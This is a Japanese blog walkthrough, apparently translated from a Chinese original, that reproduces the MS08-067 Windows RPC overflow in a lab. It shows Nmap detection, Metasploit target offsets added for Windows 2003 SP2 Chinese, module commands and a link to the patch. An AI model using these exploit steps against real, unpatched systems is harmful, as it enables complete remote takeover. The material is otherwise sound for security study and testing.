MS08-067RPC要求バッファオーバーフローの悪用


脆弱性の説明

  Windowsシステムのサーバーサービスにリモートコード実行の脆弱性が存在します。この脆弱性は、サービスが特別に細工されたRPC要求を誤って処理することによって引き起こされます。この脆弱性の悪用に成功した攻撃者は、影響を受けるシステムを完全に制御する可能性があります。

影響システム

  • Windows Vista
  • Windows2000サービス
  • Windows Server 2008
  • Windows Server 2003
  • Windows XP

脆弱性の検出

脆弱性検出のためのNmap

#nmap 目标ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse

VULNERABLE脆弱性が存在することを促す

ここに画像の説明を挿入

エクスプロイト

エクスプロイトツールはmsfであり、私が再現したシステムはWindows Server 2003SP2の中国語版です。しかし、msfには中国語版のexpフレームワークがないことがわかりました。
ここに画像の説明を挿入

エクスプロイトコードを追加します。

#修改msf漏洞利用代码
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb

次のコンテンツを追加します。

 [ 'Windows 2003 SP2 Chinese (NX)',
   {
	  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)
	  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
	  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)
	  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
          'Scratch'   => 0x00020408,
   }
],

ここに画像の説明を挿入

#进入msf
msfconsole

#查找漏洞框架并调用
search ms08-067
use exploit/windows/smb/ms08_067_netapi

system expフレームワークを表示すると、追加したものを確認できますwindwos 2003 SP2 Chinese

show targets

ここに画像の説明を挿入

ターゲットIPおよびその他のパラメータを設定すると、攻撃を開始できます

set target 1
set rhost 192.168.234.129
show options

ここに画像の説明を挿入
ここに画像の説明を挿入

脆弱性の強化

MicrosoftはMS08-067パッチをリリースしました:http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067

おすすめ

転載: blog.csdn.net/weixin_41924764/article/details/109672737